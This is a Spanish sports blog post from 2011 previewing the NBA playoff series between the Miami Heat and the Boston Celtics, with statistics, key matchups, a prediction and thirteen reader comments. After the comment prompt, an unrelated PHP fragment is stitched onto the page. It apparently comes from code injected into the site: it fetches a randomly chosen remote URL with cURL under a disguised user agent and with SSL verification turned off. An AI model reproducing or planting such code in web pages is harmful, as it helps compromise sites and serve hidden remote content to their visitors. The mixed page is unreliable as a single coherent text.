Análisis Miami Heat vs Boston Celtics

29 de April de 2011 por Jabho

Regular: 1-3 para los Celtics

Heat: 102.1 P. Favor (8º) – 94.6 P.Contra (4º)
Celtics: 96.5 P.Favor (23º) – 91.1 P.Contra (1º)

Cuando empezó la temporada Heat y Celtics se encontraban en el selecto grupo, de 3 o 4 equipos a lo sumo, que casi cualquier analista o aficionado marcaba como candidatos al título. 6 meses después, y una ronda antes de lo previsto, ha llegado el momento de que ambos lo demuestren. Y como decían en aquella vieja peli de Los Inmortales:  “Sólo puede quedar uno”.

La temporada de Miami empezó con muchas dudas de que Spoelstra fuera capaz de manejar la plantilla. Llegaron un par de rachas de malos resultados, junto las críticas que suelen acompañarlas y las dudas de si Lebron y Wade, dos manejadores de balón que consumen 20 segundos de posesión para ser efectivos, eran compatibles. Apoyados en una buena defensa y simplificando el ataque (el primero que la coja entre Lebron y Wade “organiza” la posesión) han ido encajando las piezas y cogiendo confianza. Los Heat llegan a esta cita habiendo demostrado que estaban lejos de dominar y batir el registro de 72-10 de los Bulls de Jordan con el que a principio de temporada se especulaba. Pero también han demostrado que pueden ganar a cualquiera y que desde este mismo año aspiran por derecho propio a ganar el anillo. De momento han sido el tercer mejor equipo de la liga por delante de los otros favoritos, Celtics y Lakers, y se han desecho en primera ronda de unos incómodos e infravalorados Sixers con relativa facilidad.

Boston, por su parte, ha recorrido el camino de forma inversa a los Heat, empezando muy bien y acabando la temporada regular con muchas dudas en su juego y media plantilla nueva. Los Celtics han sido el único equipo que ha conseguido un 4-0 en primera ronda recuperando la confianza, si es que la habían perdido. La eliminatoria contra los Knicks les ha servido de bálsamo en la medida en que ha permitido recuperar el juego del mejor Rondo y sumarlo al del Big Three. Además del Big Four, Jermaine ha estado bien en defensa, pero la aportación del banco ha dejado bastante que desear.

La eliminatoria se presenta durísima para ambos y ambos equipos se veran presionados, unos por las expectativas creadas y el otro por la edad que no perdona y que con el lockout a la vista quizás este ante su última oportunidad con este grupo de jugadores. Para uno acabará la temporada antes de tiempo, el otro sin embargo saldrá muy reforzado… Como hemos dicho, sólo puede quedar uno.

Claves de la eliminatoria

– El rebote de los Celtics: Si hay una laguna en el juego de los Celtics este año es el rebote. Contra los Knicks, que tampoco son el mejor equipo para sacar conclusiones, Boston si pudo dominar el rebote y si Boston te domina el rebote vete olvidándote de ganar el partido.

– El tiro de 3 puntos de los Heat: Sin buena circulación de balón y sin ningún jugador interior capaz de jugar de espaldas al aro, el ataque estático de los Heat es una versión algo mejorada del de los Cavs, donde Wade o Lebron la soban en busca de una penetración que acabe en tiro o doblando el balón para algún compañero. Del acierto en el tiro de los Bibby, House, Miller, Chalmers o Jones va a depender el castigo a una defensa que cerrará seguro las penetraciones. Hasta ahora los Heat son el 2º peor equipo en % de tiro de 3 en Playoffs.

– Mario Chalmers: Bibby es uno de los bases más lentos de la liga y por si fuera poco ni siquiera está especialmente inspirado en el tiro de 3 puntos, que es para lo que se le fichó. Veremos muchos minutos a Chalmers en pista tratando de frenar a un Rondo que ha vuelto por sus fueros en la serie contra los Knicks.

– Shaquille O´Neal: De momento no ha jugado en Play Offs pero caso de volver, y sobre todo si vuelve al nivel de inicio de temporada, sería vital para que los Celtics dominen la zona en ambos lados de la cancha.

– Spoelstra versus Rivers: En algún momento de la temporada se rumoreó que Riley quería a Doc Rivers para el año que viene. Spoelstra ha demostrado este año que es un buen entrenador pero Doc es mucho Doc… Ventaja para los Celtics en el banco.

– Wade-Lebron-Bosh contra Allen-Pierce-Garnett: Después de todo el basket no es ni una democracia ni una ciencia, es la dictadura de los mejores y los mejores deben aparecer para decidir la serie.

Pronóstico: 2-4 Celtics

Comenta

13 comentarios a esta entrada

  1. KB # 24 dice:
    #1

    Qué pronostico tan osado! Yo creo que ganarán los heat,… james y wade pueden volver locos a pierce y a allen

      Citar

  2. Len Bias dice:
    #2

    Yo creo que esto se va a ir al séptimo partido, ahí no confío especialmente en ninguno pero creo que pasarán los Heat.

    Heat 4-3 Celtics

      Citar

  3. Cocinitas dice:
    #3

    Yo creo que si los celtics recuperan a Shaq son muy favoritos, un O’ neal Jubilado hará mucho daño al juego interior de los Heat. El otro termometro de la eliminatoria es Rondo, la verdad es que si no lo defiende Wade no veo a ningun base de Miami capaz de pararlo. A los big three los veo igualados dependera de la inspiración de unos u otros.

      Citar

  4. Antoine Doinel dice:
    #4

    Aunque me duela, yo también veo pasando a Heat. Pero lo van a pasar muy mal. 4-3 es mi pronóstico.
    La serie dependerá de la capacidad de Rondo para anotar y encontrar tiros fáciles (con Allen y Pierce bien cubiertos) y del banquillo, que a dia de hoy, está mejor el de los Heat.

      Citar

  5. Vader dice:
    #5

    Si vuelve Shaq y vuelve bien las opciones de Boston se disparan. Si no es así y analizando la serie contra los Knicks veo pasando a los Heat muy a mi pesar.

    Saludos

      Citar

  6. TheDeerHunter dice:
    #6

    Yo me mojo con un 2-4 Celtics.
    Corazón de campeón…

      Citar

  7. ralage dice:
    #7

    Muy bueno el análisis , en una eliminatoria donde es difícil mojarse….
    A mi entender también será decisivo:
    El que Boston consiga que los partidos sean sin mucho ritmo y que los Heat jueguen en estático,
    y el clutch time, dondé conocemos perfectamente los antecedentes de cada equipo…
    Que ganas de q llegue el domingo!!!

      Citar

  8. GreenPride dice:
    #8

    Eliminatoria al rojo vivo, pof fin la gran eliminatoria que llevamos esperando desde el primer día de la temporada. Los 2 Big Threes enfrentados en una eliminatoria histórica. Rondo y los O’Neal son la clave para Boston junto al acierto de Ray en los triples. Por los Heat, ver si LeBron y Wade dominan la serie y el juego interior de los Heat así como sus tiradores y defensa a Rondo. Deseando ya que empiecen las series
    Pronóstico muy difícil, yo estoy con el análisis 2-4 Celtics

      Citar

  9. HisRoyalAirness dice:
    #9

    Yo apuesto por un 4-2 para Celtics aunque tengo una duda: quién defiende a Wade? Porque a Allen lo va a cargar de faltas demasiado rápido, me parece. A lo mejor me equivoco, qué pensáis?

      Citar

  10. Javijaen dice:
    #10

    4-2 para Heat, a ver si a Celtics les toca fin de ciclo como a los de San Antonio….

      Citar

  11. Pop dice:
    #11

    Vaya expulsión más rara de Pierce. Esto va a calentar la serie que no veas…

      Citar

  12. Denise dice:
    #12

    4-1 para los Heat y sin compasión. Son muy superiores a los Celtics (y a cualquiera excepto Lakers) y los van a machacar. Papilla verde van a hacer.

      Citar

  13. oscar munguia dice:
    #13

    QUE LASTIMA VER PERDER UN EQUIPO COMO BOSTON.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>